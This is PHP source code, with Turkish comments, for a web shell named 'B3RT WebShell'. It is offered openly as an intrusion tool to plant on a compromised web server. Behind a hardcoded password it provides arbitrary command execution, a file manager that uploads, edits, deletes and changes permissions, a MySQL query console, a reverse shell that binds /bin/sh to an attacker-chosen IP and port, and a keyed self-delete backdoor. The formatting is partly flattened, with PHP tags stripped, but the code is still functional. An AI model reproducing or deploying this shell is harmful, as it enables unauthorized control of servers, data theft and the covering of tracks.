/** * B3RT - Özgün WebShell * @author B3RT * @version 2.0 * * Özellikler: * - Giriş koruması (SHA256 hash) - Şifre: vinsmoke * - Dosya Yöneticisi (listele, yükle, indir, düzenle, sil, yeniden adlandır, yetki değiştir) * - Komut Çalıştırma (system, exec, shell_exec, proc_open vb.) * - Veritabanı Yönetimi (MySQL) * - Reverse Shell / Backdoor özellikleri * - Loglama (opsiyonel, izin sorunu yaşanmaması için hatalar bastırıldı) */session_start();// ================================================// KONFİGÜRASYON - vinsmoke şifresi için hash// ================================================define('SHELL_PASSWORD', '692314486fdb5a1a760cb96778461c7ea52c52d2cd69692896123ae112ff15d5'); // SHA256("vinsmoke")define('SHELL_SECRET_KEY', 'b3rt_backdoor_2026'); // Backdoor için gizli anahtardefine('SHELL_LOG_FILE', __DIR__ . '/.b3rt_log.txt'); // Log dosyasıdefine('SHELL_ENABLE_LOG', true); // Loglama açık mı? (true kalabilir, hatalar bastırıldı)// ================================================// YARDIMCI FONKSİYONLAR// ================================================function is_authenticated() { return isset($_SESSION['b3rt_auth']) && $_SESSION['b3rt_auth'] === true;}function login($password) { if (hash('sha256', $password) === SHELL_PASSWORD) { $_SESSION['b3rt_auth'] = true; return true; } return false;}function logout() { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit;}function log_action($action) { if (!SHELL_ENABLE_LOG) return; $log_entry = date('Y-m-d H:i:s') . ' - ' . $_SERVER['REMOTE_ADDR'] . ' - ' . $action . PHP_EOL; // Hata bastırma ekledik (@ ile) @file_put_contents(SHELL_LOG_FILE, $log_entry, FILE_APPEND | LOCK_EX);}function format_bytes($bytes, $precision = 2) { $units = array('B', 'KB', 'MB', 'GB', 'TB'); $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= pow(1024, $pow); return round($bytes, $precision) . ' ' . $units[$pow];}function get_file_icon($filename) { $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); $icons = [ 'folder' => '📁', 'php' => '🐘', 'html' => '🌐', 'js' => '📜', 'css' => '🎨', 'txt' => '📄', 'jpg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'zip' => '📦', 'tar' => '📦', 'gz' => '📦', 'sql' => '🗄️', 'log' => '📋', ]; if (is_dir($filename)) return $icons['folder']; return isset($icons[$ext]) ? $icons[$ext] : '📄';}// Backdoor: Eğer ?kill=1 ve ?key=gizli_anahtar gelirse, shell kendini silerif (isset($_GET['kill']) && $_GET['kill'] == '1' && isset($_GET['key']) && $_GET['key'] === SHELL_SECRET_KEY) { if (file_exists(SHELL_LOG_FILE)) @unlink(SHELL_LOG_FILE); @unlink(__FILE__); die("Shell removed.");}// ================================================// GİRİŞ KONTROLÜ// ================================================if (!is_authenticated()) { if (isset($_POST['password'])) { if (login($_POST['password'])) { log_action("Login başarılı"); header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $error = "Hatalı şifre!"; } } <!DOCTYPE html> B3RT Shell Giriş <title>B3RT Shell Giriş</title> <meta charset="utf-8"> <style> body { background: #1a1a1a; color: #0f0; font-family: monospace; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } .login { background: #2a2a2a; padding: 30px; border-radius: 10px; border: 2px solid #0f0; box-shadow: 0 0 20px #0f0; } input { background: #333; border: 1px solid #0f0; color: #0f0; padding: 10px; width: 250px; font-family: monospace; } button { background: #0f0; color: #000; border: none; padding: 10px 20px; cursor: pointer; font-weight: bold; margin-top: 10px; } button:hover { background: #0c0; } .error { color: #f00; margin-bottom: 10px; } </style> <div class="login"> 🔐 B3RT Shell
if (isset($error)) echo "<div class='error'>$error</div>"; </div> exit;}// ================================================// ANA İŞLEMLER// ================================================$action = isset($_GET['action']) ? $_GET['action'] : 'file';$cwd = isset($_GET['dir']) ? $_GET['dir'] : getcwd();if (!is_dir($cwd)) $cwd = getcwd();chdir($cwd);log_action("Action: $action, CWD: $cwd");// ================================================// DOSYA YÖNETİCİSİ FONKSİYONLARI// ================================================function file_manager($cwd) { $items = scandir($cwd); $folders = []; $files = []; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full = $cwd . '/' . $item; if (is_dir($full)) $folders[] = $item; else $files[] = $item; } sort($folders); sort($files); 📁 Dosya Yöneticisi: echo htmlspecialchars($cwd);
<div style="margin-bottom: 20px;"> <a href="?action=file&dir= echo urlencode(dirname($cwd)); ">⬆️ Üst Dizin</a> | <a href="?action=file&dir= echo urlencode(getcwd()); ">🔄 Yenile</a> | <a href="?action=upload&dir= echo urlencode($cwd); ">📤 Dosya Yükle</a> | <a href="?action=newfile&dir= echo urlencode($cwd); ">📄 Yeni Dosya</a> | <a href="?action=newfolder&dir= echo urlencode($cwd); ">📁 Yeni Klasör</a> </div> <table border="1" cellpadding="5" cellspacing="0" style="border-collapse: collapse; width: 100%;"> <tr style="background: #333;"> <th>İsim</th> <th>Boyut</th> <th>Yetki</th> <th>Son Değişiklik</th> <th>İşlemler</th> foreach ($folders as $folder): | <a href="?action=file&dir= echo urlencode($cwd . '/' . $folder); " style="text-decoration: none;">📁 echo htmlspecialchars($folder); </a> | - | echo substr(sprintf('%o', fileperms($cwd . '/' . $folder)), -4); | echo date('Y-m-d H:i', filemtime($cwd . '/' . $folder)); | <a href="?action=rename&dir= echo urlencode($cwd); &item= echo urlencode($folder); ">✏️</a> <a href="?action=chmod&dir= echo urlencode($cwd); &item= echo urlencode($folder); ">🔒</a> <a href="?action=delete&dir= echo urlencode($cwd); &item= echo urlencode($folder); " onclick="return confirm('Emin misiniz?')">🗑️</a> |
endforeach; foreach ($files as $file): | <a href="?action=view&dir= echo urlencode($cwd); &item= echo urlencode($file); "> echo get_file_icon($cwd . '/' . $file); echo htmlspecialchars($file); </a> | echo format_bytes(filesize($cwd . '/' . $file)); | echo substr(sprintf('%o', fileperms($cwd . '/' . $file)), -4); | echo date('Y-m-d H:i', filemtime($cwd . '/' . $file)); | <a href="?action=edit&dir= echo urlencode($cwd); &item= echo urlencode($file); ">✏️</a> <a href="?action=rename&dir= echo urlencode($cwd); &item= echo urlencode($file); ">🔤</a> <a href="?action=chmod&dir= echo urlencode($cwd); &item= echo urlencode($file); ">🔒</a> <a href="?action=download&dir= echo urlencode($cwd); &item= echo urlencode($file); ">⬇️</a> <a href="?action=delete&dir= echo urlencode($cwd); &item= echo urlencode($file); " onclick="return confirm('Emin misiniz?')">🗑️</a> |
endforeach; }function view_file($cwd, $item) { $full = $cwd . '/' . $item; if (!is_file($full)) die("Dosya bulunamadı."); $content = file_get_contents($full); $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); $is_text = in_array($ext, ['txt', 'php', 'html', 'htm', 'js', 'css', 'xml', 'json', 'log', 'md', 'py', 'sh']); 📄 echo htmlspecialchars($item);
<div> <a href="?action=file&dir= echo urlencode($cwd); ">🔙 Geri</a> | <a href="?action=edit&dir= echo urlencode($cwd); &item= echo urlencode($item); ">✏️ Düzenle</a> | <a href="?action=download&dir= echo urlencode($cwd); &item= echo urlencode($item); ">⬇️ İndir</a> </div> <pre style="background:#222; color:#0f0; padding:10px; overflow:auto; max-height:600px;"> echo htmlspecialchars($content); </pre> }function edit_file($cwd, $item) { $full = $cwd . '/' . $item; if (isset($_POST['content'])) { @file_put_contents($full, $_POST['content']); log_action("Dosya düzenlendi: $full"); header('Location: ?action=view&dir=' . urlencode($cwd) . '&item=' . urlencode($item)); exit; } $content = file_get_contents($full); ✏️ echo htmlspecialchars($item); Düzenle
}function upload_file($cwd) { if (isset($_FILES['file'])) { $target = $cwd . '/' . basename($_FILES['file']['name']); if (@move_uploaded_file($_FILES['file']['tmp_name'], $target)) { log_action("Dosya yüklendi: $target"); echo "<div style='color:#0f0;'>Dosya başarıyla yüklendi.</div>"; } else { echo "<div style='color:#f00;'>Yükleme hatası!</div>"; } } 📤 Dosya Yükle
}function new_file($cwd) { if (isset($_POST['filename']) && isset($_POST['content'])) { $target = $cwd . '/' . $_POST['filename']; @file_put_contents($target, $_POST['content']); log_action("Yeni dosya oluşturuldu: $target"); header('Location: ?action=file&dir=' . urlencode($cwd)); exit; } 📄 Yeni Dosya Oluştur
}function new_folder($cwd) { if (isset($_POST['foldername'])) { $target = $cwd . '/' . $_POST['foldername']; if (!is_dir($target)) @mkdir($target); log_action("Yeni klasör oluşturuldu: $target"); header('Location: ?action=file&dir=' . urlencode($cwd)); exit; } 📁 Yeni Klasör Oluştur
}function download_file($cwd, $item) { $full = $cwd . '/' . $item; if (is_file($full)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($full) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($full)); readfile($full); exit; }}function delete_item($cwd, $item) { $full = $cwd . '/' . $item; if (is_file($full)) @unlink($full); elseif (is_dir($full)) @rmdir($full); log_action("Silindi: $full"); header('Location: ?action=file&dir=' . urlencode($cwd)); exit;}function rename_item($cwd, $item) { $full = $cwd . '/' . $item; if (isset($_POST['newname'])) { $new = $cwd . '/' . $_POST['newname']; @rename($full, $new); log_action("Yeniden adlandırıldı: $full -> $new"); header('Location: ?action=file&dir=' . urlencode($cwd)); exit; } 🔤 echo htmlspecialchars($item); Yeniden Adlandır
}function chmod_item($cwd, $item) { $full = $cwd . '/' . $item; if (isset($_POST['perms'])) { $perms = octdec($_POST['perms']); @chmod($full, $perms); log_action("Yetki değiştirildi: $full -> " . $_POST['perms']); header('Location: ?action=file&dir=' . urlencode($cwd)); exit; } $current = substr(sprintf('%o', fileperms($full)), -4); 🔒 echo htmlspecialchars($item); Yetki Değiştir
}function command_exec() { $output = ''; if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; log_action("Komut çalıştırıldı: $cmd"); if (function_exists('proc_open')) { $descriptors = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $process = proc_open($cmd, $descriptors, $pipes); if (is_resource($process)) { $stdout = stream_get_contents($pipes[1]); $stderr = stream_get_contents($pipes[2]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); $output = $stdout . ($stderr ? "\nSTDERR:\n" . $stderr : ''); } } elseif (function_exists('shell_exec')) { $output = shell_exec($cmd . ' 2>&1'); } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $out, $ret); $output = implode("\n", $out); } elseif (function_exists('system')) { ob_start(); system($cmd . ' 2>&1', $ret); $output = ob_get_clean(); } else { $output = "Komut çalıştırma fonksiyonu bulunamadı."; } } ⌨️ Komut Çalıştır
if ($output): Çıktı:
<pre style="background:#222; color:#0f0; padding:10px; overflow:auto;"> echo htmlspecialchars($output); </pre> endif;}function database_manager() { 🗄️ Veritabanı Yöneticisi
if (isset($_POST['db_connect']) && isset($_POST['db_host']) && isset($_POST['db_user'])) { $conn = @mysqli_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']); if ($conn) { echo "<div style='color:#0f0;'>Bağlantı başarılı.</div>"; $_SESSION['db_conn'] = serialize($conn); } else { echo "<div style='color:#f00;'>Bağlantı hatası: " . mysqli_connect_error() . "</div>"; } } if (isset($_SESSION['db_conn'])) { $conn = unserialize($_SESSION['db_conn']); if (isset($_POST['sql_query'])) { $result = mysqli_query($conn, $_POST['sql_query']); if ($result) { if (is_bool($result)) { echo "<div style='color:#0f0;'>Sorgu başarılı.</div>"; } else { echo "<table border='1' cellpadding='5'>"; $fields = mysqli_fetch_fields($result); foreach ($fields as $field) { echo "<th>" . htmlspecialchars($field->name) . "</th>"; } echo "
"; while ($row = mysqli_fetch_assoc($result)) { echo ""; foreach ($row as $val) { echo "| " . htmlspecialchars($val) . " | "; } echo "
"; } echo ""; } } else { echo "<div style='color:#f00;'>Hata: " . mysqli_error($conn) . "</div>"; } } SQL Sorgusu
}}function reverse_shell() { if (isset($_POST['ip']) && isset($_POST['port'])) { $ip = $_POST['ip']; $port = (int)$_POST['port']; $sock = @fsockopen($ip, $port); if ($sock) { $descriptorspec = array(0 => $sock, 1 => $sock, 2 => $sock); $process = proc_open('/bin/sh', $descriptorspec, $pipes); if (is_resource($process)) proc_close($process); echo "<div style='color:#0f0;'>Reverse shell başlatıldı.</div>"; log_action("Reverse shell başlatıldı: $ip:$port"); } else { echo "<div style='color:#f00;'>Bağlantı kurulamadı.</div>"; } } 🔄 Reverse Shell
}function backdoor_panel() { 🔙 Backdoor Paneli
<ul> <li><a href="?action=backdoor&kill=1">Kendini Sil (Backdoor)</a></li> <li><a href="?action=logout">Çıkış Yap</a></li> </ul> if (isset($_GET['kill']) && $_GET['kill'] == '1') { if (isset($_GET['key']) && $_GET['key'] === SHELL_SECRET_KEY) { @unlink(__FILE__); die("Shell kaldırıldı."); } else { echo "<div style='color:#f00;'>Yetkisiz işlem!</div>"; } }}// ================================================// ARAYÜZ// ================================================<!DOCTYPE html>B3RT WebShell <title>B3RT WebShell</title> <meta charset="utf-8"> <style> body { background: #0a0a0a; color: #0f0; font-family: 'Courier New', monospace; margin: 20px; } a { color: #0f0; text-decoration: none; border-bottom: 1px dashed #0f0; } a:hover { color: #ff0; border-bottom: 1px solid #ff0; } .menu { background: #222; padding: 10px; border-bottom: 2px solid #0f0; margin-bottom: 20px; } .menu a { margin-right: 20px; } table { border-color: #0f0; } th { background: #333; } td { background: #1a1a1a; } input, textarea, select { background: #333; color: #0f0; border: 1px solid #0f0; font-family: 'Courier New', monospace; } input[type=submit], button { background: #0f0; color: #000; border: none; padding: 5px 10px; cursor: pointer; font-weight: bold; } input[type=submit]:hover { background: #0c0; } .logout { float: right; } </style> <div class="menu"> <a href="?action=file&dir= echo urlencode($cwd); ">📁 Dosya Yöneticisi</a> <a href="?action=command">⌨️ Komut Çalıştır</a> <a href="?action=database">🗄️ Veritabanı</a> <a href="?action=reverse">🔄 Reverse Shell</a> <a href="?action=backdoor">🔙 Backdoor</a> <a href="?action=logout" class="logout">🚪 Çıkış</a> </div> <div class="content"> switch ($action) { case 'file': file_manager($cwd); break; case 'view': if (isset($_GET['item'])) view_file($cwd, $_GET['item']); break; case 'edit': if (isset($_GET['item'])) edit_file($cwd, $_GET['item']); break; case 'upload': upload_file($cwd); break; case 'newfile': new_file($cwd); break; case 'newfolder': new_folder($cwd); break; case 'download': if (isset($_GET['item'])) download_file($cwd, $_GET['item']); break; case 'delete': if (isset($_GET['item'])) delete_item($cwd, $_GET['item']); break; case 'rename': if (isset($_GET['item'])) rename_item($cwd, $_GET['item']); break; case 'chmod': if (isset($_GET['item'])) chmod_item($cwd, $_GET['item']); break; case 'command': command_exec(); break; case 'database': database_manager(); break; case 'reverse': reverse_shell(); break; case 'backdoor': backdoor_panel(); break; case 'logout': logout(); break; default: file_manager($cwd); } </div>